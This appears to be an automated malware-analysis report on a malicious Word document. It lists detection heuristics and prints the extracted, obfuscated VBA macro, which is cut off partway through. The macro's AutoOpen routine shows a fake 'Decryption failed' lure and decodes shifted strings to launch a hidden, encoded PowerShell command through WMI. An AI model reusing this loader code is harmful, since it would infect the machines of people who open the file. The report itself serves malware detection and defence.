MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file contains a heavily obfuscated VBA macro with an AutoOpen function, which is a common loader technique. The macro uses GetObject and potentially other execution methods to run arbitrary code, indicated by the 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens' heuristics. The script attempts to decrypt and execute a payload, likely involving a second-stage download, but the exact URL or command is obfuscated. The presence of GetObject and the overall structure suggest a downloader or dropper.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4505 bytes |
SHA-256: f44803d0129098abbf4ce06c96d26c2408893b96258a18d25e8aa74d5d4fe57a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Dim JCkxoRBPynMExQ As String
Dim gsRJcVnw As Object
Dim iztHUFEfusHPmmlWcqiCfcac As Integer
Dim dzBMNIYcZgZdyZI As String
Dim KWevsQeOpnmAPmRl As String
Dim rngFirstParagraph As Range
Dim sID As String
Set rngFirstParagraph = ActiveDocument.Paragraphs(1).Range
With rngFirstParagraph
.Delete
.InsertAfter Text:="Decryption failed" & Chr(10)
.InsertAfter Text:="ErrCode:0x05" & Chr(10)
.InsertParagraphAfter
With .Font
.Name = "Century"
.Size = 12
End With
End With
iztHUFEfusHPmmlWcqiCfcac = 9716
KWevsQeOpnmAPmRl = qvtIi("IHLAwWqOqoH")
Set gsRJcVnw = GetObject(KWevsQeOpnmAPmRl)
dzBMNIYcZgZdyZI = lzWLxBExN("IHLAwWqOqoH")
dzBMNIYcZgZdyZI = JpeNvwoLgvTSxK(gsRJcVnw, dzBMNIYcZgZdyZI, iztHUFEfusHPmmlWcqiCfcac)
End Sub
Function lzWLxBExN(qFIlBjXodohTRCfHDRST As String) As String
Dim MOZdAWNIwbLzgfJWlu As String
Dim HraTLBiqV As String
Dim jsBVeahIKWU As String
jsBVeahIKWU = "vu}kxynkrr4k~k&3tuv&3}&nojjkt&3kti&PGH7GNOGhGG?GIOGgGH6GNWGiGH GJuGR}G|GNiGj}H9GI:GgmHnGMWGhGGzGM>GimG{GMSGh}HzGI>Gj}HrGMOGjWHvGI:G_}H|GM:G`mGoGJyGQGHUGM[Gj}GzGK>G_mHwGM[G_}H6GIGG[}H;GNSGjGHrGM6GRmHUG"
Dim OajBM As String
OajBM = "M[GjGG{GLiG`WHoGKSGhGHvGM[GhmH6GIqGRmHKGM>Gj}H{GM}Gh}HnGMWGXmHvGM}G`WGuGIWGjWH GM}GRGGqGM[GhmH8GJuG\GHrGM6GiGGxGIiG^GHJGM>GhWH}GN[GjGHrGNOGRmH8GMOGi}GtGIqGU}GqGNSGjGHnGNOGjGH\GNGGXmH|GM}G`GHrGNOGOGG?G"
Dim qxHCvXFxjlcacDy As String
qxHCvXFxjlcacDy = "IGGOmGqGK[GhmH8GJuGWWHWGLGGXGHHGLWGWWHiGK6GgWHpGNOGh}H GM>G`mH6GL}G\}HvGM:G`GH|GNiGi}HiGLSGjGHnGNOGjGGmGK6G`WH{GN[G^GHWGNOGh}HtGNOG_WHzGNSG^GHZGNWG_WH GNWGjWH}GIOGU}GqGNWG`WHzGNGGVWGoGIWGXWH{GN_GUmH6G"
Dim kFhIJ As String
kFhIJ = "M[GhWH}GL}GW}H|GM6GiGH7GNWG`WH GI:GjmHoGNSGOmG=GMSGi}HpGNOGgWH}GNWGOGGqGNWG`WHzGNGGU}HJGM>GiGH;GI6GYWH6GM[GhWGmGIWGjGHrGM6GiGGmGIWGi}H6GMKGimH6GL[GiGHMGM>GhGHqGM[GimG=GLOG`WHzGM>GjmHrGI6GYWH6GM[GhWGmG"
Dim MRrpF As String
MRrpF = "IWGjGHrGM6GiGG=GGCC"
MOZdAWNIwbLzgfJWlu = jsBVeahIKWU & OajBM & qxHCvXFxjlcacDy & kFhIJ & MRrpF
MOZdAWNIwbLzgfJWlu = YdoQa(MOZdAWNIwbLzgfJWlu)
lzWLxBExN = MOZdAWNIwbLzgfJWlu
End Function
Function ZMxwQzU() As String
Dim PloKBTmiiWQIpTTTLk As String
PloKBTmiiWQIpTTTLk = YdoQa("}otsmszy@xuuz5ios|8")
ZMxwQzU = PloKBTmiiWQIpTTTLk
End Function
Function JpeNvwoLgvTSxK(gJyAaTKda As Object, LYrDQtTPFRlS As String, shnIviWG As Integer) As String
Dim mBeuYtzxKFJZdSQvxWdHosh As String
Dim XetxVOaoktUrHUgMmMDYpku As Integer
Dim YLNZqCoH As Integer
Dim ulWhTLJ As Integer
XetxVOaoktUrHUgMmMDYpku = 6
mBeuYtzxKFJZdSQvxWdHosh = LYrDQtTPFRlS
If (shnIviWG > XetxVOaoktUrHUgMmMDYpku) Then
Set KzvmfJNmAskYGYTvumBkTV = GetObject(ZMxwQzU())
Set RYNGHXPC = KzvmfJNmAskYGYTvumBkTV.Get(YdoQa("]ot98eVxuikyyYzgxz{v"))
Set lRqRoVGNdqgKwBayUgKuAKk = RYNGHXPC.SpawnInstance_
XetxVOaoktUrHUgMmMDYpku = shnIviWG - shnIviWG
XetxVOaoktUrHUgMmMDYpku = XetxVOaoktUrHUgMmMDYpku + 12
lRqRoVGNdqgKwBayUgKuAKk.ShowWindow = XetxVOaoktUrHUgMmMDYpku
ulWhTLJ = gJyAaTKda.Create(mBeuYtzxKFJZdSQvxWdHosh, Null, lRqRoVGNdqgKwBayUgKuAKk, YLNZqCoH)
End If
mBeuYtzxKFJZdSQvxWdHosh = "sIxvKuspx"
JpeNvwoLgvTSxK = mBeuYtzxKFJZdSQvxWdHosh
End Function
Function qvtIi(ttYImzolfjXPQ As String) As String
Dim UCJVWDU As String
UCJVWDU = YdoQa("}otsmszy@]ot98eVxuikyy")
qvtIi = UCJVWDU
End Function
Function YdoQa(dzLwQuGAOBlnQ As String) As String
Dim SPolvBuDKMPTKDs As Long
Dim mXuOsnwWjVrqSp As String
Dim MWCzHkgMsGNFqetTefS As Integer
Dim int1 As Integer
MWCzH
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.